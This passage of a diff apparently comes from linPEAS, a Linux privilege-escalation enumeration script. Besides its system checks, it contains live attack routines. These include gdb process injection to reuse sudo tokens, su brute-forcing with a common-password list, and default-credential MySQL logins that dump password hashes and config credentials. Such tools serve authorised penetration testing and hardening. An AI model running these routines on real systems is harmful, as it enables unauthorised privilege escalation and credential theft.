root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi + echo "" + + #-- PCS) Different processes 1 min + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + if [ "`ps -e -o command 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e -o command >> $file.tmp1 2>/dev/null; sleep 0.05; done; sort $file.tmp1 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi + echo "" + fi + + #-- PCS) Cron + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" + command -v crontab 2>/dev/null || echo_not_found "crontab" + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + command -v incrontab 2>/dev/null || echo_not_found "incrontab" + incrontab -l 2>/dev/null + ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + crontab -l -u "$USER" 2>/dev/null | tr -d "\r" + ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths + echo "" + + #-- PCS) Services + print_2title "Services" + print_info "Search for outdated versions" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + echo "" + + #-- PSC) systemd PATH + print_2title "Systemd PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" + WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders"` + echo "" + + #-- PSC) .service files + #TODO: .service files in MACOS are folders + print_2title "Analyzing .service files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" + printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do + if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1="`grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' \"$s\" 2>/dev/null | grep -Iv \"=/\"`" + relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi + fi + done + if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi + echo "" + + #-- PSC) Timers + print_2title "System timers" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found + echo "" + + #-- PSC) .timer files + print_2title "Analyzing .timer files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" + printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" + fi + timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" + printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done + done + echo "" + + #-- PSC) .socket files + #TODO: .socket files in MACOS are folders + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths="`grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths="`grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" + printf "%s\n" "$socketsbinpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done + done + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi + echo "" + + #-- PSC) Search HTTP sockets + print_2title "HTTP sockets" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1 | while read s; do + socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`" + if [ $? -eq 0 ]; then + owner="`ls -l \"$s\" | cut -d ' ' -f 3`" + echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" + fi + done + echo "" + + #-- PSC) Writable and weak policies in D-Bus config files + print_2title "D-Bus config files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" + if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=`grep "" "$f" 2>/dev/null` + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=`grep "/dev/null | grep -v "root"` + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=`grep "/dev/null | grep -v "root"` + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify allows in context="default" + done + done + fi + echo "" + + print_2title "D-Bus Service Objects list" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" + dbuslist=$(busctl list 2>/dev/null) + if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g"; + if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then + srvc_object=`echo $line | cut -d " " -f1` + srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi + done + else echo_not_found "busctl" + fi + echo "" + echo "" + + + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep Net`" ]; then + ########################################### + #---------) Network Information (---------# + ########################################### + print_title "Network Information" + + #-- NI) Hostname, hosts and DNS + print_2title "Hostname, hosts and DNS" + cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null + dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" + echo "" + + #-- NI) /etc/inetd.conf + print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + echo "" + + #-- NI) Interfaces + print_2title "Interfaces" + cat /etc/networks 2>/dev/null + (ifconfig || ip a) 2>/dev/null + echo "" + + #-- NI) Neighbours + print_2title "Networks and neighbours" + (route || ip n || cat /proc/net/route) 2>/dev/null + (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null + echo "" + + #-- NI) Iptables + print_2title "Iptables rules" + (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" + echo "" + + #-- NI) Ports + print_2title "Active Ports" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" + ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${SED_RED}," + echo "" + + #-- NI) tcpdump + print_2title "Can I sniff with tcpdump?" + timeout 1 tcpdump >/dev/null 2>&1 + if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" + + #-- NI) Internet access + if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" + fi + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep UsrI`" ]; then + ########################################### + #----------) Users Information (----------# + ########################################### + print_title "Users Information" + + #-- UI) My user + print_2title "My user" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "" + + #-- UI) PGP keys? + print_2title "Do I have PGP keys?" + command -v gpg 2>/dev/null || echo_not_found "gpg" + gpg --list-keys 2>/dev/null + command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" + netpgpkeys --list-keys 2>/dev/null + command -v netpgp 2>/dev/null || echo_not_found "netpgp" + echo "" + + #-- UI) Clipboard and highlighted text + print_2title "Clipboard or highlighted text?" + if [ `command -v xclip 2>/dev/null` ]; then + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + elif [ `command -v xsel 2>/dev/null` ]; then + echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + else echo_not_found "xsel and xclip" + fi + echo "" + + #-- UI) Sudo -l + print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" + (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" + if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" + fi + (cat /etc/sudoers | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" + if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi + for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + cat "$filename" | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," + fi + done + echo "" + + #-- UI) Sudo tokens + print_2title "Checking sudo tokens" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" + ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" + if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${SED_RED},g"; + else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${SED_GREEN},g"; + fi + is_gdb="`command -v gdb 2>/dev/null`" + if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; + else echo "gdb wasn't found in PATH" | sed "s,gdb,${SED_GREEN},g"; + fi + if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + done + if [ -f "/tmp/shrndom32r2r" ]; then + rm /tmp/shrndom32r2r 2>/dev/null + echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + else echo "The escalation didn't work... (try again later?)" + fi + fi + echo "" + + #-- UI) Doas + print_2title "Checking doas.conf" + if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," + else echo_not_found "/etc/doas.conf" + fi + echo "" + + #-- UI) Pkexec policy + print_2title "Checking Pkexec policy" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + echo "" + + #-- UI) Superusers + print_2title "Superusers" + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," + echo "" + + #-- UI) Users with console + print_2title "Users with console" + if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + echo "" + fi + done + else + no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" + fi + done + fi + fi + echo "" + + #-- UI) All users & groups + print_2title "All users & groups" + if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" + else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" + fi + echo "" + + #-- UI) Login now + print_2title "Login now" + (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + echo "" + + #-- UI) Last logons + print_2title "Last logons" + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + echo "" + + #-- UI) Login info + print_2title "Last time logon each user" + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + echo "" + + #-- UI) Password policy + print_2title "Password policy" + grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" + echo "" + + #-- UI) Brute su + EXISTS_SUDO="`command -v sudo 2>/dev/null`" + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=`check_if_su_brute`; + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num $u $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi + else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC + fi + print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + echo "" + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep SofI`" ]; then + ########################################### + #--------) Software Information (---------# + ########################################### + print_title "Software Information" + + #-- SI) Mysql version + print_2title "MySQL version" + mysql --version 2>/dev/null || echo_not_found "mysql" + echo "" + + #-- SI) Mysql connection root/root + print_list "MySQL connection using default root/root ........... " + mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` + if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + #-- SI) Mysql connection root/toor + print_list "MySQL connection using root/toor ................... " + mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` + if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + #-- SI) Mysql connection root/NOPASS + mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` + print_list "MySQL connection using root/NOPASS ................. " + if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + #-- SI) Mysql credentials + print_2title "Searching mysql credentials and exec" + if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in `find $d -name debian.cnf 2>/dev/null`; do + if [ -r $f ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + for f in `find $d -name user.MYD 2>/dev/null`; do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do + if [ -r "$f" ]; then + u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," + fi + done + for f in `find $d -name my.cnf 2>/dev/null`; do + if [ -r "$f" ]; then + echo "Found readable $f" + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done + else echo_not_found + fi + echo "" + + print_2title "Analyzing PostgreSQL Files (limit 70)" + echo "Version: $(warn_exec psql -V 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then echo_not_found "postgresql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} 